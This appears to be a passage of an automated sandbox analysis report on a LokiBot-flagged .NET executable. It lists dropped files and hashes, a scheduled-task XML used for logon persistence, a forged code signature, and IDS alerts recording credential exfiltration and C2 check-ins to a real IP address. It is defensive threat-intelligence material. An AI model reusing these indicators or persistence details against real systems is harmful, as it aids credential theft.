SHA-512:	E62C0270DF4CE14071D0DCC308904E4DF32952FDAF0BAA72964EEB6D2CC2DA8345301478FDD344C280281892E8820A3C05189C47F81AABD21726C48382E16FD0
Malicious:	false
Preview:	MDMP..a..... .......].Og.........................#..........<....,.......2..*g..........`.......8...........T...........8F..L&..........,-.........../..............................................................................eJ......./......GenuineIntel............T...........T.Og............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA81.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6398
Entropy (8bit):	3.7217534616566033
Encrypted:	false
SSDEEP:	192:R6l7wVeJRy6Au5LYZobWpr989bcwsfU0m:R6lXJk6A0YyFcDfu
MD5:	AF1623FAA26A45B34C5532B48498EE80
SHA1:	4D4B8EF340EBDFCA5533CD538A52F05C3F6B4FBC
SHA-256:	9E9908C6087139E0889ED2972D6005501D27F9258E7B6E51A119B7D117C6D8C5
SHA-512:	BDA072112CF1BAA792043C4F40DE05E7AD8AF7C44656F88A5349EA5666A6B8001D0D77985BA323CCB84DC8BFE685C64F3C8EF77C51222CFF3EC125B13842AD74
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAD0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4749
Entropy (8bit):	4.46631290291847
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZlJg77aI9DwWpW8VYjYm8M4JlJO7F/+q8vYJOUFKPACd:uIjfpI7NJ7VjJf4KEt8PACd
MD5:	E3E2D92005C34E3B9AD7BBA796A741B5
SHA1:	03C2397FDAEF80D899ECE7E47C265CD60435D0F5
SHA-256:	863669A56917B7DEF995FDB4FDD8EDE4DA6ED1C4F4D9A65E0B4D6EF9C754EB8F
SHA-512:	B297D645333009A186792B3CD3AC7087B54CF251FE55785B22C6E158DDEA3AECDC3D507E6D5E3A3562EA55BF57A7AB9F7F99372393903AB7DED2147EFD015621
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="615317" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LEmJJ87mUQ.exe.log

Download File

Process:	C:\Users\user\Desktop\LEmJJ87mUQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
MD5:	AF15464AFD6EB7D301162A1DC8E01662
SHA1:	A974B8FEC71BF837B8E72FE43AB43E447FC43A86
SHA-256:	103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
SHA-512:	7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_behydvpn.pj1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgrzduey.s3v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szt4u3pv.t5n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo0awnwi.hsz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp33C7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\aWBoUwiux.exe
File Type:	XML 1.0 document, ASCII text
Category:	modified
Size (bytes):	1582
Entropy (8bit):	5.100126720598039
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTGyv
MD5:	715161194DFA6CB90F8224C3F1313D00
SHA1:	2FCB0D8630B359633A773858FCD464236BC266B5
SHA-256:	15624BCFA62C4F8D8272EFA61F9F7EB75D24FB0DD8414DC589A396C7473CA365
SHA-512:	DCBE320762281A7AA5CFCD422ED267A73F7ED3A63C5589921783968D11791BF0CBE3E0BC04ADAA8294CD00D7DEF9976DC14BECB37560005C82CE1B1799F64933
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpE3D.tmp

Download File

Process:	C:\Users\user\Desktop\LEmJJ87mUQ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.100126720598039
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtG+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTGyv
MD5:	715161194DFA6CB90F8224C3F1313D00
SHA1:	2FCB0D8630B359633A773858FCD464236BC266B5
SHA-256:	15624BCFA62C4F8D8272EFA61F9F7EB75D24FB0DD8414DC589A396C7473CA365
SHA-512:	DCBE320762281A7AA5CFCD422ED267A73F7ED3A63C5589921783968D11791BF0CBE3E0BC04ADAA8294CD00D7DEF9976DC14BECB37560005C82CE1B1799F64933
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Download File

Process:	C:\Users\user\Desktop\LEmJJ87mUQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	613384
Entropy (8bit):	7.64116125343091
Encrypted:	false
SSDEEP:	12288:1L3qZB+Zno/SWqpqqMDz2aH3gId4Ti/lkUNz3PLhRN1YlEUWj8kR:1L3KB+9oP0qTzJbmelkUR3PL1JH
MD5:	7E1D910ADE786C9880194CE5E7C66C8B
SHA1:	C2DEE65FD0B225E9ECF1EA718D1015359F7132CE
SHA-256:	868444860F70D7825D5801E3EBDC8E9F0C5FFE72C3F42A938B7DF98D50E10758
SHA-512:	DEF1D3762997F41FF2A045FA6428F30471A3E6825FDA0BF880789A7514C4855E7C4064FD2F1D6C7D211A729B08ACDA2CB40DEFAFF91DD84C467F1EDD52285A0E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..............8... ...@....@.. ....................................@.................................H8..O....@..(............&...6...`..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`.......$..............@..B................\|8......H...................$...$\...............................................0............}.....r...p}......}......}......}.....( ......(......{.....o!.....{.....o!.....{.....o!.....{..........%.r...p.%.r...p.%.r...p.("...&*.0..-..........{.....X}.....{.... .....6.{.... .....).{.... .......{.... .......{.... ......+....,....{.....X}.....+X.{.... p....6.{.... X....).{.... @......{.... (#.....{.... .'....+....,....{.....X}.......{....(......{....r...p.\|....(#...($...o%.....(......{

C:\Users\user\AppData\Roaming\aWBoUwiux.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\LEmJJ87mUQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.64116125343091
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	LEmJJ87mUQ.exe
File size:	613'384 bytes
MD5:	7e1d910ade786c9880194ce5e7c66c8b
SHA1:	c2dee65fd0b225e9ecf1ea718d1015359f7132ce
SHA256:	868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758
SHA512:	def1d3762997f41ff2a045fa6428f30471a3e6825fda0bf880789a7514c4855e7c4064fd2f1d6c7d211a729b08acda2cb40defaff91dd84c467f1edd52285a0e
SSDEEP:	12288:1L3qZB+Zno/SWqpqqMDz2aH3gId4Ti/lkUNz3PLhRN1YlEUWj8kR:1L3KB+9oP0qTzJbmelkUR3PL1JH
TLSH:	40D4E1A02668DF12D6B90FF10420D6760BB66E9AFC51E3469EE9FCD73937BD00660643
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............8... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x49389a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x85E3D10F [Thu Mar 7 20:11:59 2041 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/11/2018 19:00:00 08/11/2021 18:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93848	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x628	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x92600	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x96000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8fc1c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x918a0	0x91a00	658047b2704c4b113b653b0661ed165c	False	0.8460434549356223	data	7.647162115963495	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x628	0x800	504cc96b7529a20128073d43f13db6b2	False	0.3369140625	data	3.4830242379684244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x96000	0xc	0x200	dd7eb274d99b604701985ee56c76a4e0	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x94090	0x398	OpenPGP Public Key			0.42391304347826086
RT_MANIFEST	0x94438	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T17:14:14.887037+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:14.887037+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:14.887037+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:16.044187+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:17.626140+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:19.163529+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:19.163529+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49757	172.67.134.88	80	TCP
